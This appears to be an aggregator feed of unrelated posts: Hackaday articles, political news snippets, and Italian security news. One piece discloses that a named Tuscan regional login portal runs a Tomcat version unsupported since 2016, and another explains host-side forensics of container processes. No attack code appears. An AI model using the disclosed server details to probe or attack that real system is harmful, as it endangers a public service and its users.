


A new pact between security and economic growth. Patalano (KCL) explains defence under Labour

@Notizie dall'Italia e dal mondo

The Strategic Defence Review published yesterday by the British government, at an event in Glasgow attended by Prime Minister Sir Keir Starmer and Secretary John Healey, lays out Britain's challenges and strategy in a world that, it reads, is marked by a growing



Referendum, Corrado (PD) against Meloni: “What kind of answer is that?”


@Politica interna, europea e internazionale
“What kind of answer is that?”: with these words Annalisa Corrado, Member of the European Parliament for the Partito Democratico, criticised the position taken by Prime Minister Giorgia Meloni, who yesterday, on the occasion of the Festa della Repubblica, made a statement ahead of the vote at the polls on the 8th and



Supercon 2024: How To Track Down Radio Transmissions


You turn the dial on your radio, and hear a powerful source of interference crackle in over the baseline noise. You wonder where it might be coming from. You’re receiving it well, and the signal strength is strong, but is that because it’s close or just particularly powerful? What could it be? How would you even go about tracking it down?

When it comes to hunting down radio transmissions, Justin McAllister and Nick Foster have a great deal of experience in this regard. They came down to the 2024 Hackaday Superconference to show us how it’s done.

Transmissions From Where?


youtube.com/embed/3vLtIsfRu_o?…

Nick Foster opens the talk by discussing how the first job is often to figure out what you’re seeing when you pick up a radio transmission. “The moral of this talk is that your hardware is always lying to you,” says Nick. “In this talk, we’re going to show you how your radio lies to you, what you can do about it, and if your hardware is not lying to you, what is that real station that you’re looking at?” It can be difficult to tease out the truth of what the radio might seem to be picking up. “How do we determine what a signal actually is?” he asks. “Is it a real signal that we’re looking at which is being transmitted deliberately from somebody else, or is it interference from a bad power supply, or is it a birdie—a signal that’s created entirely within my own radio that doesn’t exist at all?”

There are common tools used to perform this work of identifying just what the radio is actually picking up and where it’s coming from. Justin goes over some of the typical hardware, noting that the RX-888 is a popular choice for software-defined radio that can be tuned across HF, VHF, and UHF bands. It’s highly flexible, and it’s affordable to boot, as is the Web-888 which can be accessed conveniently over a web browser. Other common SDRs are useful, too, as are a variety of filters that can aid with more precise investigations.
Justin demonstrates an errant radio emission from the brushed motor in his furnace, noting how it varies in bandwidth—a surefire tell versus intentional radio transmissions.
Establishing a grounding in reality is key, as Justin steps up to explain. “We turn our SDR on, we stick [on] the little antenna that comes with it, and we start looking at something,” says Justin. “Are the signals that we see there actually real?” He notes that there are some basics to consider right off the bat. “One key point to make is that nobody makes money or has good communication using an unmodulated carrier,” he points out. “If you just see a tone somewhere, it might be real, but there’s a good chance that it’s not.”

It’s perhaps more likely unintentional radiation, noise, or something generated inside the hardware itself on your end. It’s also worth looking at whether you’re looking at a fixed frequency or a changing frequency to pin things down further. Gesturing to a spectrogram, he notes that the long, persistent lines on the spectrogram are usually clues to more intentional transmissions. Intermittent squiggles are more often unintentional. Justin points at some that he puts down to the emissions from arc welders, sparking away as they do, and gives an example of what emissions from typical switching power supplies look like.
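One way to make the “unmodulated carrier” heuristic concrete is to compare how much spectrum a signal actually occupies. This little Python sketch (my illustration, not from the talk) builds a pure tone plus a crude BPSK-style modulated version of it, and counts the DFT bins carrying meaningful power:

```python
import cmath, math, random

# A pure carrier concentrates its energy in a single pair of DFT bins,
# while a modulated signal spreads it out. Counting the bins above a
# small fraction of the peak is a crude proxy for occupied bandwidth.
N = 256

def dft_power(samples):
    return [abs(sum(s * cmath.exp(-2j * math.pi * k * n / N)
                    for n, s in enumerate(samples))) ** 2
            for k in range(N)]

def occupied_bins(samples, frac=0.01):
    power = dft_power(samples)
    peak = max(power)
    return sum(1 for p in power if p > frac * peak)

random.seed(1)
tone = [math.cos(2 * math.pi * 32 * n / N) for n in range(N)]
# Carrier multiplied by random data bits, one bit per 8 samples (BPSK-ish).
bits = [random.choice((-1, 1)) for _ in range(N // 8)]
modulated = [bits[n // 8] * tone[n] for n in range(N)]

print(occupied_bins(tone), occupied_bins(modulated))
```

The tone lights up exactly two bins (the carrier and its mirror image), while the modulated signal smears energy across many more, the same contrast a waterfall display shows.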

There are other hints to look out for, too. Real human-made signals tend to have some logic to them. Justin notes that real signals usually make “efficient” use of spectrum without big gaps or pointless repetition. It’s also possible to make judgement calls as to whether a given signal makes sense for the band it appears to be transmitted in. Schedule can be a tell, too—if a signal always pops up when your neighbor gets home at 6 PM, it might just be coming from their garage door remote. Justin notes a useful technique for hunting down possible nearby emitters—”Flipping on and off switches is a real good way of figuring out—is it close to me or not?”
SDRs are hugely flexible, but they also have very open front-ends that can lead to some confusing output.
Nick follows up by discussing the tendency of sampling radios to show bizarre transmissions that aren’t apparent on an analog receiver. “One of the curses of the RTL-SDR is actually one of its strengths… it has a completely wide open front end,” notes Nick. “Its ADC which is sampling and capturing the RF has basically nothing except an amplifier in between it and whatever crud you’re putting into it.” This provides great sensitivity and frequency agility, but there’s a catch—”It will happily eat up and spit out lots of horrible stuff,” says Nick. He goes on to explain various ways such an SDR might lie to the user. A single signal might start popping up all over the frequency band, or interfere with other signals coming in from the antenna. He also highlights a great sanity check for hunting down birdies—”If it’s always there, if it’s unchanging, if you unplug your antenna and you still hear it—it’s probably generated in your radio!”

The rest of the talk covers locating transmissions—are they in your house, in the local community, or from even farther afield? It explores the technique of multilateration, where synchronized receivers and maths are used to measure the time differences seen in the signal at each point to determine exactly where a transmission is coming from. The talk also goes over common sources of noise in residential settings—cheap PWM LED lights, or knock-off laptop chargers being a prime example in Nick’s experience. There’s also a discussion of how the noise floor has shifted up a long way compared to 50 years ago, now that the world is full of so many more noise-emitting appliances.
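The multilateration idea can be sketched in a few lines: each pair of synchronized receivers yields a time difference of arrival (TDOA), and the transmitter must lie where all the implied hyperbolas agree. This toy Python example is illustrative only (real systems use proper least-squares solvers, not a grid search, and the positions here are made up):

```python
import math

# Toy multilateration sketch: three synchronized receivers measure the
# *difference* in arrival time of one transmission. Each time difference
# constrains the transmitter to a hyperbola; a coarse grid search finds
# the point that best matches all measured differences.
C = 299_792_458.0  # speed of light, m/s

def tdoa(tx, rx_a, rx_b):
    """Time-difference-of-arrival between two receivers, in seconds."""
    return (math.dist(tx, rx_a) - math.dist(tx, rx_b)) / C

def locate(receivers, tdoas, span=1000, step=10):
    """Grid-search the point whose predicted TDOAs best match the measured ones."""
    best, best_err = None, float("inf")
    for x in range(0, span + 1, step):
        for y in range(0, span + 1, step):
            p = (x, y)
            err = sum(
                (tdoa(p, receivers[i], receivers[j]) - t) ** 2
                for (i, j), t in tdoas.items()
            )
            if err < best_err:
                best, best_err = p, err
    return best

rx = [(0, 0), (1000, 0), (0, 1000)]
true_tx = (620, 370)
measured = {(0, 1): tdoa(true_tx, rx[0], rx[1]),
            (0, 2): tdoa(true_tx, rx[0], rx[2])}
print(locate(rx, measured))  # grid resolution limits accuracy to ±step
```

With noiseless measurements the search lands back on the true position; with real receivers, clock synchronization error dominates the accuracy budget.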

Ultimately, the duo of Justin and Nick brought us a great pun-filled talk on sleuthing for the true source of radio transmissions. If you’ve ever wondered about how to track down some mystery transmitter, you would do well to watch and learn from the techniques explored within!


hackaday.com/2025/06/03/superc…




Simulation and Motion Planning for 6DOF Robotic Arm


ManiPylator focusing its laser pointer at a page.

[Leo Goldstien] recently got in touch to let us know about a fascinating update he posted on the Hackaday.io page for ManiPylator — his 3D-printed six-degrees-of-freedom (6DOF) robotic arm.

This latest installment gives us a glimpse at what’s involved in command and control of such a device, as well as what goes into simulation and testing. Much of the requisite mathematics is introduced, along with a long list of links for further reading. The whole solution is based entirely on free and open source (FOSS) software: in fact, a giant stack of such software, including planning and simulation software on top of glue like MQTT message queues.

The practical exercise for this installment was to have the arm trace out the shape of a heart, given as a mathematical equation expressed in Python code, and it fared quite well. Measurements were taken! Science was done!
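The article doesn't reproduce [Leo]'s actual equation, but the idea is easy to sketch: sample a parametric curve into waypoints for the planner to follow. Here is a classic heart curve in Python, as a stand-in for whatever expression ManiPylator actually traces:

```python
import math

# [Leo]'s exact equation isn't given in the article, so this stand-in
# uses a well-known parametric heart curve, sampled into XY waypoints of
# the kind a motion planner could consume.
def heart_points(n=100, scale=1.0):
    pts = []
    for i in range(n):
        t = 2 * math.pi * i / n
        x = 16 * math.sin(t) ** 3
        y = (13 * math.cos(t) - 5 * math.cos(2 * t)
             - 2 * math.cos(3 * t) - math.cos(4 * t))
        pts.append((scale * x, scale * y))
    return pts

waypoints = heart_points(n=200, scale=0.005)  # roughly a 16 cm-wide heart
print(len(waypoints), waypoints[0])
```

Each waypoint would then be handed to the inverse-kinematics solver to produce joint angles, which is where the real mathematics of the project lives.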

We last brought you word about this project in October of 2024. Since then, the project name has changed from “ManiPilator” to “ManiPylator”. Originally the name was a reference to the Raspberry Pi, but now the focus is on the Python programming language. But all the bot’s best friends just call him “Manny”.

If you want to get started with your own 6DOF robotic arm, [Leo] has traced out a path for you to follow. We’d love to hear about what you come up with!

youtube.com/embed/as9t7umI3mM?…


hackaday.com/2025/06/03/simula…



Don’t empower agencies to gut free speech


Federal agencies are transforming into the speech police under President Donald Trump. So why are some Democrats supporting the Kids Online Safety Act, a recently reintroduced bill that would authorize the MAGA-controlled Federal Trade Commission to enforce censorship?

As Freedom of the Press Foundation (FPF) senior advocacy adviser Caitlin Vogus wrote for The Boston Globe, there’s never an excuse for supporting censorship bills, especially when political loyalists at the FTC are sure to abuse any power they’re given to stifle news on disfavored topics.

Vogus wrote, “KOSA’s supporters argue that it’s about keeping children under 17 safe from the harms of social media. But at the heart of the bill is something everyone should oppose: empowering the government to decide what speech children should be forbidden from seeing online.”

Read the article here.


freedom.press/issues/dont-empo…



Android updates for June 2025 fix 36 vulnerabilities: update your devices


@Informatica (Italy e non Italy 😁)
Google has released the Android Security Bulletin for June 2025, with updates for 36 vulnerabilities: the most severe, identified in the System component, could cause local privilege escalation without any



Rai live streaming abroad: a guide to watching its TV programmes


@Informatica (Italy e non Italy 😁)
To watch Rai's live stream from abroad, using a VPN (Virtual Private Network) is recommended. VPNs let you change your IP address, simulating a connection from Italy, which makes it possible to get around the blocks imposed by the restrictions



Code and ethics. The intelligence that is changing the world

The article comes from #Euractiv Italia and has been reshared on the Lemmy community @Intelligenza Artificiale
On 13 June, the lawyer Federica De Stefani will chair the conference “Il codice e l’etica. L’intelligenza che cambia il mondo” (“Code and ethics. The intelligence that is changing the world”) in Mantua, the closing event of the second year of the Percorso di Eccellenza of the Università degli

Intelligenza Artificiale reshared this.



Anti-porn laws can't stop porn, but they can stop free speech. In the meantime, people will continue to get off to anything and everything.


#sex #porn



Add Wood Grain Texture to 3D Prints – With a Model of a Log


Adding textures is a great way to experiment with giving 3D prints a different look, and [PandaN] shows off a method of adding a wood grain effect in a way that’s easy to play around with. It involves using a 3D model of a log (complete with concentric tree rings) as a print modifier. The good news is that [PandaN] has already done the work of creating one, as well as showing how to use it.
The model of the stump — complete with concentric tree rings — acts as a modifier for the much-smaller printed object (in this case, a small plate).
In the slicer software one simply uses the log as a modifier for an object to be printed. When a 3D model is used as a modifier in this way, it means different print settings get applied everywhere the object to be printed and the modifier intersect one another.

In the case of this project, the modifier shifts the angle of the fill pattern wherever the models intersect. A fuzzy skin modifier is used as well, and the result is enough to give a wood grain appearance to the printed object. When printed with a wood filament (which is PLA mixed with wood particles), the result looks especially good.

We’ve seen a few different ways to add textures to 3D prints, including using Blender to modify model surfaces. Textures can enhance the look of a model, and are also a good way to hide layer lines.

In addition to the 3D models, [PandaN] provides a ready-to-go project for Bambu slicer with all the necessary settings already configured, so experimenting can be as simple as swapping the object to be printed with a new 3D model. Want to see that in action? Here’s a separate video demonstrating exactly that step-by-step, embedded below.

youtube.com/embed/dPqu9Sk01jc?…


hackaday.com/2025/06/03/add-wo…



Technological obsolescence: Regione Toscana's Accesso Sicuro runs on a server nine years out of support


Technological obsolescence is a nasty beast!

You find yourself with devices and applications that work perfectly well but have become unusable, because the systems are no longer supported, the apps stop updating, and security patches become a mirage. This is not just a practical nuisance: it is a concrete risk, above all in IT. Obsolete technologies become the favorite target of cyber attacks, leaving companies, public bodies, and end users extremely vulnerable. Staying up to date is no longer optional: it is a necessity.

Of course, tackling a replatforming, that is, migrating applications and systems to new platforms when products move to new major releases, is not simple at all. The process can demand resources, skills, and time. Even so, planning for these upgrades within the software life cycle is an unavoidable responsibility. Ignoring them means accumulating technical debt and putting at risk the entire digital ecosystem on which the organization rests.

Regione Toscana's Accesso Sicuro portal


The site accessosicuro.rete.toscana.it/… is Regione Toscana's official portal for accessing online services with secure authentication. Through this portal, citizens, professionals, and operators can carry out various administrative and healthcare procedures remotely, in a protected manner compliant with current regulations.

Aside from some directory listings present on the site, what N3m0D4m brought to our attention is the version of the Apache Tomcat server in production: version 6.0.33, which went out of support on 31 December 2016.

So we are talking about a server that has not received security patches for a full nine years.
Error page on the rete.toscana.it portal showing the presence of an obsolete application server

What technological obsolescence is


Technological obsolescence occurs when a system, device, or piece of software becomes inadequate not because it stops working, but because it no longer receives technical support or security updates from its vendor.

In the context of cybersecurity, this is a highly critical problem. When a system is no longer updated, the vulnerabilities discovered over time remain open. Every uncorrected bug or flaw is a door left ajar that an attacker can easily exploit. And when the application is exposed to the internet, the risks become far, far greater.

What exactly happens?


  • No security patches: cyber criminals actively look for unpatched systems, because they know exactly how to hit them.
  • Risk expands over time: the longer since the last update, the greater the number of publicly known vulnerabilities affecting that system.
  • Incompatibility with new defensive technologies: modern EDR/XDR software, antivirus, firewalls, and monitoring systems do not always work on obsolete technology, leaving entire environments uncovered.
  • Use in chained attacks: a vulnerable system can be the entry point for compromising an entire corporate or institutional network, even if the server itself delivers no service.


A problem for everyone


This is not a theoretical risk: the news is full of cases in which a single obsolete component allowed an attacker to take control of entire systems. In public administration, where dated technologies often coexist with sensitive data, obsolescence is a genuine ticking time bomb.

And it is not just about malware or ransomware: unpatched flaws can enable theft of personal data, unauthorized access, content tampering, and much more.

How to tackle technological obsolescence


Tackling technological obsolescence requires strategic vision and a proactive approach.

It is not enough to react when a system stops working or stops receiving updates: it is essential to plan the life cycle of the technologies in use ahead of time. This means monitoring the end-of-life (EoL) dates of critical software and systems, establishing a roadmap for upgrades, and budgeting resources for evolutionary maintenance. Every organization should maintain an up-to-date IT inventory, with clear indicators of the status and criticality of its components, to prevent the accumulation of technical debt.
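As a minimal sketch of the EoL tracking described above, a script can compare each inventory entry's end-of-support date against today and flag what is overdue. The inventory and dates below are illustrative examples, not a live feed; a real deployment would pull them from an asset database or a service such as endoflife.date:

```python
from datetime import date

# Illustrative inventory: component -> end-of-support date.
inventory = {
    "Apache Tomcat 6.0.33": date(2016, 12, 31),
    "Ubuntu 20.04 LTS": date(2025, 5, 31),
    "PostgreSQL 16": date(2028, 11, 9),
}

def eol_report(inventory, today=None):
    """Days past end-of-support per component (positive = out of support)."""
    today = today or date.today()
    return {component: (today - eol).days
            for component, eol in sorted(inventory.items(), key=lambda kv: kv[1])}

for component, overdue in eol_report(inventory, today=date(2025, 6, 3)).items():
    status = f"OUT OF SUPPORT for {overdue} days" if overdue > 0 else "supported"
    print(f"{component}: {status}")
```

Run on a schedule, this kind of report turns the "nine years out of support" surprise into an ordinary ticket raised years in advance.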

The key is continuous modernization, not emergency intervention.

Where possible, it helps to adopt modular, scalable solutions that ease future upgrades without having to rebuild the entire infrastructure from scratch. Moreover, replatforming, however complex, must be treated as an integral part of long-term maintenance. It is important to keep technical teams, security officers, and strategic decision-makers in constant dialogue to weigh impacts, costs, and benefits. Only then is it possible to guarantee operational continuity, security, and sustainability over time.

In conclusion


Technological obsolescence is not just a matter of efficiency or modernization: it is a matter of security. In the digital world, continuing to use unsupported software or infrastructure is like leaving your front door open in a high-risk neighborhood.

In today's context, where cyber attacks grow in complexity and frequency, ignoring updates means deliberately exposing yourself to danger. And the price is not only technical: it can translate into reputational damage, penalties for regulatory non-compliance (such as the GDPR), loss of sensitive data, and high recovery costs.

Updating is no longer a choice; it is a duty of digital responsibility, for private actors and, above all, for the public institutions that run essential services for citizens.

Technology evolves, but security cannot be left behind.

As is our custom, we always leave room for a statement from the organization should it wish to give us updates on this matter, and we will be happy to publish it in a dedicated article highlighting the issue.

RHC will monitor the development of this story and publish further news on the blog should there be substantial updates. Anyone with knowledge of the facts who wishes to provide information anonymously can use the whistleblower's encrypted email.

The article “Obsolescenza Tecnologica. Accesso Sicuro della Regione Toscana su server obsoleto da 9 anni” comes from il blog della sicurezza informatica.



My Winter of ’99: The Year of the Linux Desktop is Always Next Year


Growing up as a kid in the 1990s was an almost magical time. We had the best game consoles, increasingly faster computers at a pace not seen before, the rise of the Internet and World Wide Web, as well as the best fashion and styles possible between neon and pastel colors, translucent plastic, and also this little thing called Windows 95 that’d take the world by storm.

Yet as great as Windows 95 and its successor Windows 98 were, you had to be one of the lucky folks who ended up with a stable Windows 9x installation. The prebuilt (Daewoo) Intel Celeron 400 rig with 64 MB SDRAM that I had splurged on with money earned from summer jobs was not one of those lucky systems, resulting in regular Windows reinstalls.

As a relatively nerdy individual, I was aware of this little community-built operating system called ‘Linux’, with the online forums and the Dutch PC magazine that I read convincing me that it would be a superior alternative to this unstable ‘M$’ Windows 98 SE mess that I was dealing with. Thus it was in the Year of the Linux Desktop (1999) that I went into a computer store and bought a boxed disc set of SuSE 6.3 with included manual.

Fast-forward to 2025, and Windows is installed on all my primary desktop systems, raising the question of what went wrong in ’99. Wasn’t Linux the future of desktop operating systems?

Focus Groups

Boxed SuSE Linux 6.3 software. (Source: Archive.org)
Generally when companies gear up to produce something new, they will determine and investigate the target market, to make sure that the product is well-received. This way, when the customer purchases the item, it should meet their expectations and be easy to use for them.

This is where SuSE Linux 6.3 was an interesting experience for me. I’d definitely have classified myself in 1999 as your typical computer nerd who was all about the Pentiums and the MHz, so at the very least I should have had some overlap with the nerds who wrote this Linux OS thing.

The comforting marketing blurbs on the box promised an easy installation and bundled applications for everything, suggesting that office and home users alike would be more than happy to use this operating system. Despite the warnings and notes in the installation section of the included manual, installation was fairly painless, with YAST (Yet Another Setup Tool) handling a lot of the tedium.

However, after logging into the new operating system and prodding and poking at it a bit over the course of a few days, reality began to set in. There was the rather rough-looking graphical interface, with what I am pretty sure was the FVWM window manager for XFree86, no font aliasing and very crude widgets. I would try the IceWM window manager and a few others as well, but to say that I felt disappointed was an understatement. Although it generally worked, the whole experience felt unfinished and much closer to using CDE on Solaris than to the relatively polished Windows 98 or the BeOS Personal Edition 5 that I would be playing with around that time as well.

That’s when a friend of my older brother slipped me a completely legit copy of Windows 2000 plus license key. To my pleasant surprise, Windows 2000 ran smoothly, worked great and was stable as a rock even on my old Celeron 400 rig that Windows 98 SE had struggled with. I had found my new forever home, or so I thought.

Focus Shift

Start-up screen of FreeSCO. (Credit: Lewis “Lightning” Baughman, Wikimedia)
With Windows 2000, and later XP, being my primary desktop systems, my focus with Linux would shift away from the desktop experience and more towards other applications, such as the FreeSCO (en français) single-floppy router project, and the similar Smoothwall project. After upgrading to a self-built AMD Duron 600 rig, I’d use the Celeron 400 system to install various Linux distributions on, to keep tinkering with them. This led me down the path of trying Wine to run Windows applications on Linux in the 2000s, along with some Windows games ported by Loki Entertainment, with mostly disappointing results. This also got me to compile kernel modules, to make the onboard sound work in Linux.

Over the subsequent years, my hobbies and professional career would take me down into the bowels of Linux and similar systems, mostly through embedded (Yocto) development, so that by now I’m more familiar with Linux from the command line and at the architectural level. Although I have many Linux installations kicking around with a perfectly fine X/Wayland installation, on both real hardware and in virtual machines, generally the first thing I do after logging in is pop open a Bash terminal or two, or switch to a different TTY.

Yet now that the rainbows-and-sunshine era of Windows 2000 through Windows 7 has come to a fiery end amidst the dystopian landscape of Windows 10 and with Windows 11 looming over the horizon, it’s time to ask whether I would make the jump to the Linux desktop now.

Linux Non-Standard Base


Bringing things back to the ‘focus group’ aspect, perhaps one of the most off-putting elements of the Linux ecosystem is the completely bewildering explosion of distributions, desktop environments, window managers, package managers and ways of handling even basic tasks. All the skills that you learned while using Arch Linux or SuSE/Red Hat can be mostly tossed out the moment you are on a Debian system, never mind something like Alpine Linux. The differences can be as profound as when using Haiku, for instance.

Rather than Linux distributions focusing on a specific group of users, they seem to be primarily about doing what the people in charge want. This is illustrated by the demise of the Linux Standard Base (LSB) project, which was set up in 2001 by large Linux distributions in order to standardize various fundamentals between these distributions. The goals included a standard filesystem hierarchy, the use of the RPM package format and binary compatibility between distributions to help third-party developers.

By 2015 the project was effectively abandoned, and since then distributing software across Linux distributions has become if possible even more convoluted, with controversial ‘solutions’ like Canonical’s Snap, Flatpak, AppImage, Nix and others cluttering the landscape and sending developers scurrying back in a panic to compiling from source like it’s the 90s all over again.

Within an embedded development context this lack of standardization is also very noticeable, between differences in default compiler search paths, broken backwards compatibility — like the removal of ifconfig — and a host of minor and larger frustrations, even before hitting big-ticket items like service management flitting between SysV, Upstart, and systemd, or distributions having invented their own, even if possibly superior, alternatives like OpenRC in Alpine Linux.

Of note here is also that these system service managers generally do not work well with GUI-based applications, as CLI Linux and GUI Linux are still effectively two entirely different universes.

Wrong Security Model


For some inconceivable reason, Linux – despite not having UNIX roots like BSD – has opted to adopt the UNIX filesystem hierarchy and security model. While this is of no concern when you look at Linux as a wannabe-UNIX that will happily do the same multi-user server tasks, it’s an absolutely awful choice for a desktop OS. Without knowledge of the permission levels on folders, basic things like SSH keys will not work; accessing network interfaces with Wireshark requires root-level access; and some parts of the filesystem, like device nodes, require the user to be in a specific group.
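As a concrete example of the kind of permission trap mentioned above: OpenSSH refuses a private key that is readable by group or others. A small Python check makes the rule explicit; this is a sketch run against a throwaway file rather than a real key:

```python
import os, stat

# OpenSSH rejects private keys whose mode allows group or other access.
# This helper checks a file the same way: no group/other bits may be set.
def key_permissions_ok(path):
    mode = stat.S_IMODE(os.stat(path).st_mode)
    return (mode & 0o077) == 0

with open("demo_key", "w") as f:
    f.write("not a real key\n")
os.chmod("demo_key", 0o644)
print(key_permissions_ok("demo_key"))  # False: group/world readable
os.chmod("demo_key", 0o600)
print(key_permissions_ok("demo_key"))  # True
os.remove("demo_key")
```

On Windows none of this exists; coming from there, the silent failure of an SSH key with mode 0644 is exactly the kind of thing that grates.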

When the expectation of a user is that the OS behaves pretty much like Windows, then the continued fight against an overly restrictive security model is just one more item that is not necessarily a deal breaker, but definitely grates every time that you run into it. Having the user experience streamlined into a desktop-friendly experience would help a lot here.

Unstable Interfaces


Another really annoying thing with Linux is that there is no stable kernel driver API. This means that with every update to the kernel, each of the kernel drivers has to be recompiled to work. This tripped me up in the past with Realtek chipset drivers for WiFi and Bluetooth. Since these chips were too new to be covered by the in-tree Realtek drivers, I had to find a version of the driver source on GitHub, run through the whole string of commands to compile the kernel module, and finally load it.

After running a system update a few days later and doing a restart, the system was no longer to be found on the LAN. This was because the WiFi driver could no longer be loaded, so I had to plug in Ethernet to regain remote access. With this experience in mind I switched to using Wireless-N WiFi dongles, as these are directly supported.

Experiences like this fortunately happen on non-primary systems, where a momentary glitch is of no real concern, especially since I made backups of configurations and such.

Convoluted Mess


This, in a nutshell, is why moving to Linux is something that I’m not seriously considering. Although I would be perfectly capable of using Linux as my desktop OS, I’m much happier on Windows — if you ignore Windows 11. I’d feel more at home on FreeBSD as well, as it is a far more coherent experience, not to mention BeOS’ successor Haiku, which is becoming tantalizingly usable.

Secretly my favorite operating system to switch to after Windows 10 would be ReactOS, however. It would bring the best of Windows 2000 through Windows 7, be open-source like Linux, yet completely standardized and consistent, and come with all the creature comforts that one would expect from a desktop user experience.

One definitely can dream.


hackaday.com/2025/06/03/my-win…



Host-based logs, container-based threats: How to tell where an attack began



The risks associated with containerized environments


Although containers provide an isolated runtime environment for applications, this isolation is often overestimated. While containers encapsulate dependencies and ensure consistency, the fact that they share the host system’s kernel introduces security risks.

Based on our experience providing Compromise Assessment, SOC Consulting, and Incident Response services to our customers, we have repeatedly seen issues related to a lack of container visibility. Many organizations focus on monitoring containerized environments for operational health rather than security threats. Some lack the expertise to properly configure logging, while others rely on technology stacks that don’t support effective visibility of running containers.

Environments that suffer from such visibility issues are often challenging for threat hunters and incident responders because it can be difficult to clearly distinguish between processes running inside a container and those executed on the host itself. This ambiguity makes it difficult to determine the true origin of an attack and whether it started in a compromised container or directly on the host.

The aim of this blog post is to explain how to restore the execution chain inside a running container using only host-based execution logs, helping threat hunters and incident responders determine the root cause of a compromise.

How containers are created and operate


To effectively investigate security incidents and hunt for threats in containerized environments, it’s essential to understand how containers are created and how they operate. Unlike virtual machines, which run as separate operating systems, containers are isolated user-space environments that share the host OS kernel. They rely on namespaces, control groups (cgroups), union filesystems, Linux capabilities, and other Linux features for resource management and isolation.

Because of this architecture, every process inside a container technically runs on the host, but within a separate namespace. Threat hunters and incident responders typically rely on host-based execution logs to gain a retrospective view of executed processes and command-line arguments. This allows them to investigate environments that lack dedicated container monitoring solutions. However, some logging configurations may lack critical attributes such as namespaces, cgroups, or specific syscalls. In such cases, rather than relying solely on missing log attributes, we can bridge this visibility gap by understanding the process execution chain of a running container from a host perspective.
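One host-side trick follows directly from this architecture: since a containerized process lives in its own namespaces, comparing a process's namespace links under /proc with those of PID 1 flags likely container processes without any container-aware tooling. The heuristic below is my illustration, not a standard API, and reading other processes' /proc entries generally requires root:

```python
import os

# Every process in a container runs on the host, but inside different
# Linux namespaces. A process sharing none of these namespace IDs with
# PID 1 is likely containerized.
NAMESPACES = ("pid", "mnt", "net", "uts", "ipc")

def ns_ids(pid):
    ids = {}
    for ns in NAMESPACES:
        try:
            ids[ns] = os.readlink(f"/proc/{pid}/ns/{ns}")  # e.g. 'pid:[4026531836]'
        except OSError:  # process gone, or insufficient privileges
            ids[ns] = None
    return ids

def likely_containerized(pid):
    """True if the process shares none of the listed namespaces with PID 1."""
    host, proc = ns_ids(1), ns_ids(pid)
    differing = [ns for ns in NAMESPACES
                 if proc[ns] is not None and proc[ns] != host[ns]]
    return len(differing) == len(NAMESPACES)

print(likely_containerized(os.getpid()))
```

The same namespace inode numbers also appear in well-configured audit logs, which is why enriching execution logs with namespace IDs removes this ambiguity at the source.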

Overview of the container creation workflow

End users interact with command-line utilities, such as the Docker CLI, kubectl and others, to create and manage their containers. On the backend, these utilities communicate with an engine that talks to a high-level container runtime, most commonly containerd or CRI-O. These high-level runtimes delegate the heavy lifting of interacting with the Linux kernel to a low-level container runtime such as runc (the most common), which allocates cgroups, namespaces, and other kernel primitives to create and kill containers based on a bundle provided by the high-level runtime, which in turn assembles it from user-provided arguments. The bundle is a self-contained directory that defines the configuration of a container according to the Open Container Initiative (OCI) Runtime Specification. It mainly consists of:

  1. A rootfs directory that serves as the root filesystem for the container. It is created by extracting and combining the layers from a container image, typically using a union filesystem like OverlayFS.
  2. A config.json file containing the OCI runtime configuration, which specifies the process, mounts, and other settings needed to create the container.
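For reference, an abridged config.json looks roughly like this (trimmed to the fields relevant here; a real file generated by containerd carries many more entries for mounts, capabilities, and cgroups):

```json
{
  "ociVersion": "1.0.2",
  "process": {
    "terminal": false,
    "user": { "uid": 0, "gid": 0 },
    "args": [ "/bin/sh" ],
    "cwd": "/"
  },
  "root": { "path": "rootfs", "readonly": false },
  "linux": {
    "namespaces": [
      { "type": "pid" },
      { "type": "mount" },
      { "type": "network" }
    ]
  }
}
```

The process.args field is the container’s entrypoint, which becomes relevant again later when hunting for suspicious entrypoint command lines.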

It’s important to note which mode runc has been executed in, since it supports two modes: foreground mode and detached mode. The resulting process tree may vary depending on the chosen mode. In foreground mode, a long-running runc process remains in the foreground as a parent process for the container process, primarily to handle the stdio so the end user can interact with the running container.

Process tree of a container created in foreground mode using runc

In detached mode, however, there is no long-running runc process. After creating the container, runc exits, leaving the caller process, in most cases containerd or CRI-O, to take care of the stdio. As the screenshot below shows, when we execute a detached container using runc directly, the runc process creates it and immediately exits; hence, the parent of the container process is the host’s PID 1 (the systemd process).

Process tree of a container created in detached mode using runc

However, if we create a detached container using Docker CLI, for example, we’ll notice that the parent of the container process is a shim process, not PID 1!

Process tree of a container created in detached mode using Docker CLI

In modern architectures, communication between high- and low-level container runtimes is proxied through a shim process. This allows containers to run independently of the high-level container runtime, ensuring the running container survives even if the high-level runtime crashes or restarts. The shim process also manages the stdio of the container process so users can later attach to running containers via commands like docker exec -it &lt;container&gt;. The shim can also redirect stdout and stderr to log files that users can later inspect either directly from the filesystem or via commands like kubectl logs &lt;pod&gt; -c &lt;container&gt;.

When a detached container is created using Docker CLI, the high-level container runtime, for example, containerd, executes a shim process that calls runc as a low-level container runtime for the sole purpose of creating the container in detached mode. After that, runc immediately exits. To avoid orphan processes or reparenting to the PID 1, as in the case when we executed runc ourselves, the shim process explicitly sets itself as a subreaper to adopt the container processes after runc exits. A Linux subreaper process is a designated parent that takes care of orphaned child processes in its chain (instead of init), allowing it to manage and clean up its entire process tree.
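The subreaper trick is a single prctl(2) call. A minimal illustration of the same mechanism, sketched here in Python via ctypes purely for demonstration (the actual shim is a Go program):

```python
import ctypes

libc = ctypes.CDLL("libc.so.6", use_errno=True)

# From <sys/prctl.h>: PR_SET_CHILD_SUBREAPER marks the caller as a
# "child subreaper", so orphaned descendants are reparented to it
# instead of to PID 1 -- the same call containerd-shim-runc-v2 makes
# before invoking runc.
PR_SET_CHILD_SUBREAPER = 36

ret = libc.prctl(PR_SET_CHILD_SUBREAPER, 1, 0, 0, 0)
print("subreaper set:", ret == 0)
```

Any descendant forked after this call whose intermediate parents exit is adopted by this process rather than by init, which is why detached containers show up under the shim in the process tree.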

Detached containers will be reparented to the shim process after creation

This is implemented in the latest V2 shim and is the default in modern containerd implementations.

The shim process sets itself as a subreaper process during creation

When we check the help message of the containerd-shim-runc-v2 process, for example, we notice that it accepts the container ID as a command-line argument, and calls it the id of the task.

Help message of the shim process

We can confirm this by checking the command-line arguments of the running containerd-shim-runc-v2 processes and comparing them with the running containers.

The shim process accepts the ID of the relevant container as a command-line argument

So far, we’ve successfully identified container processes from the host’s perspective. In modern architectures, one of the following processes will typically be seen as a predecessor process for the containerized processes:

  • A shim process, in the case of detached mode; or
  • A runc process, in the case of foreground (interactive) mode.

We can also use the command-line arguments of the shim process to determine which container the process belongs to.

